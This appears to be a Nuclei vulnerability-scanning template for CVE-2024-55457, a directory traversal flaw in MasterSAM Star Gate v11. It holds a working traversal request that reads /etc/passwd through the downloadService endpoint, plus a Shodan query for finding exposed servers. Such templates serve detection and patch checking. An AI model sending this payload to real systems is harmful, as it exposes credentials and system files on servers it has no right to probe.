id: CVE-2024-55457 info: name: MasterSAM Star Gate v11 - Local File Inclusion author: DhiyaneshDK severity: high description: | MasterSAM Star Gate v11 is vulnerable to a directory traversal attack via the endpoint /adama/adama/downloadService. An attacker can exploit this vulnerability by manipulating the file parameter to access arbitrary files on the server, potentially leading to the exposure of sensitive information. impact: | Unauthenticated attackers can exploit directory traversal to read arbitrary files from the server, potentially exposing sensitive configuration data, credentials, and system files. remediation: | Contact MasterSAM for a patched version of Star Gate v11 that addresses the directory traversal vulnerability. reference: - https://github.com/h13nh04ng/CVE-2024-55457-PoC - https://x.com/cyber_advising/status/1876034270852231257 classification: cve-id: CVE-2024-55457 cwe-id: CWE-22 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N cvss-score: 6.5 epss-score: 0.03007 epss-percentile: 0.86039 metadata: verified: true max-request: 1 shodan-query: html:"MasterSAM" tags: cve,cve2024,lfi,mastersam,v11,adama,vkev,vuln http: - method: GET path: - "{{BaseURL}}/adama/adama/downloadService?type=1&file=../../../../etc/passwd" matchers: - type: dsl dsl: - "contains_all(header, 'application/octet-stream', 'filename=')" - "regex('root:.*:0:0:', body)" - "status_code == 200" condition: and # digest: 4b0a00483046022100830c015fb09f905acef77adbade86911214241198df23e2dd859e6d7e8c54f76022100a63ed7c0541d9f10bd0cda5c19c4a892d9bcd80afe38706c142062517f738afd:922c64590222798bb761d5b6d8e72950